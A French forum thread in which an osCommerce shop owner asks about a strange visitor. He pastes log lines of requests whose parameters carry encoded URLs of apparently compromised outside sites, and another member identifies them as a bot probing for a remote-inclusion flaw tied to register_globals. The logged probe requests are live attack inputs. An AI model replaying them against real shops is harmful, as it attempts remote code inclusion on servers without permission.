visiteur bizarre sur le serveur

[sylvainz]

Bonjour, sur un nouveau site oscommerce hébergé aux usa, en visionnant "Qui est en ligne ?" je vois un visiteur dont l'IP 92.43.200.98 semble être celle d'un robot, mais qui affiche des lignes contenant des URL de sites touristiques et autres. Est-ce que quelqu'un aurait une explication ? Par avance merci, cordialement Sylvain

Voici ces lignes :

00:12:00 0 Guest 92.43.200.98 23:37:30 23:37:30 /product_reviews.php?products_id=43

00:12:01 0 Guest 92.43.200.98 23:37:29 23:37:29 /product_info.php?products_id=43

00:12:02 0 Guest 92.43.200.98 23:37:28 23:37:28 /product_reviews.php?products_id=38

00:12:03 0 Guest 92.43.200.98 23:37:27 23:37:27 /./././././boutique.php

00:12:03 0 Guest 92.43.200.98 23:37:27 23:37:27 /product_reviews_write.php?cPath=1&products_id=3

00:12:04 0 Guest 92.43.200.98 23:37:26 23:37:26 /product_info.php?products_id=38

00:12:06 0 Guest 92.43.200.98 23:37:24 23:37:24 /product_reviews.php?cPath=1&products_id=3

00:12:07 0 Guest 92.43.200.98 23:37:23 23:37:23 /boutique.php?cPath=1_12&page=http%3A%2F%2Fwww.clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F&sort=2d

00:12:08 0 Guest 92.43.200.98 23:37:22 23:37:22 /boutique.php?cPath=1_12&page=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fanawuho%2Fledego%2F&sort=2d

00:12:09 0 Guest 92.43.200.98 23:37:21 23:37:21 /boutique.php?cPath=1_12&page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Feridehi%2F&sort=2d

00:12:10 0 Guest 92.43.200.98 23:37:20 23:37:20 /boutique.php?cPath=1_12&sort=2a&action=http%3A%2F%2Fwww.destinationthesun.info%2Fcapeverde%2Fform%2Fuse%2Fsampleform%2Fadmin%2Fitixahe%2Frilika%2F&products_id=36

00:12:11 0 Guest 92.43.200.98 23:37:19 23:37:19 /boutique.php?cPath=1_12&sort=2a&action=http%3A%2F%2Fcyberoute.com%2Fdemo%2Fdocs%2Fimages%2Fgurod%2Fahah%2F&products_id=36

00:12:12 0 Guest 92.43.200.98 23:37:18 23:37:18 /boutique.php?cPath=1_12&sort=2a&action=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fludeme%2Fgakacag%2F&products_id=36

00:12:13 0 Guest 92.43.200.98 23:37:17 23:37:17 /boutique.php?cPath=1_12

00:12:14 0 Guest 92.43.200.98 23:37:16 23:37:16 /./././boutique.php

00:12:15 0 Guest 92.43.200.98 23:37:15 23:37:15 /product_info.php?cPath=1&products_id=3

00:12:17 0 Guest 92.43.200.98 23:37:13 23:37:13 /product_info.php?cPath=1&products_id=1

00:12:21 0 Guest 92.43.200.98 23:37:09 23:37:09 /shopping_cart.php?sort=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fasagula%2F

00:12:24 0 Guest 92.43.200.98 23:37:06 23:37:06 /product_info.php?cPath=1&products_id=http%3A%2F%2Fwww.asigurareamea.ro%2Fupload_fisiere%2Fibanar%2Fsuxokud%2F

00:12:23 0 Guest 92.43.200.98 23:37:07 23:37:07 /shopping_cart.php?sort=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Figodoq%2Fbukosud%2F

00:12:22 0 Guest 92.43.200.98 23:37:08 23:37:08 /shopping_cart.php?sort=http%3A%2F%2Fwww.math.science.cmu.ac.th%2Flms%2Flib%2Fadodb%2Fpear%2Fnoxifi%2Fezogan%2F

00:12:26 0 Guest 92.43.200.98 23:37:04 23:37:04 /product_info.php?cPath=http%3A%2F%2Fwww.slda.info%2Fimages%2Fedunuha%2Fade%2F&products_id=1

00:12:25 0 Guest 92.43.200.98 23:37:05 23:37:05 /product_info.php?cPath=1&products_id=http%3A%2F%2Fwww.syntasoft.com%2Fforum%2FThemes%2Favas%2Fatefa%2F

00:12:24 0 Guest 92.43.200.98 23:37:06 23:37:06 /product_info.php?cPath=1&products_id=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F

00:12:27 0 Guest 92.43.200.98 23:37:03 23:37:03 /product_info.php?cPath=http%3A%2F%2Fwww.insanechicken.com%2F%2FphpMyAdmin%2Flibraries%2Fludeme%2Fgakacag%2F&products_id=1

00:12:28 0 Guest 92.43.200.98 23:37:02 23:37:02 /product_info.php?cPath=http%3A%2F%2Fwww.qualitas1988.com%2Fupload%2Finterswitchnigeria_com%2Fdovi%2Fduq%2Fanesesu%2F&products_id=1

[pluriels]

au vu des logs, ton robot essaie de trouver une faille via l'url, si tu as une version récente et sécurisée d'OSC et un serveur sécurisé , tu ne devrais pas voir de problème.

(en particulier la fameuse variable register_globals)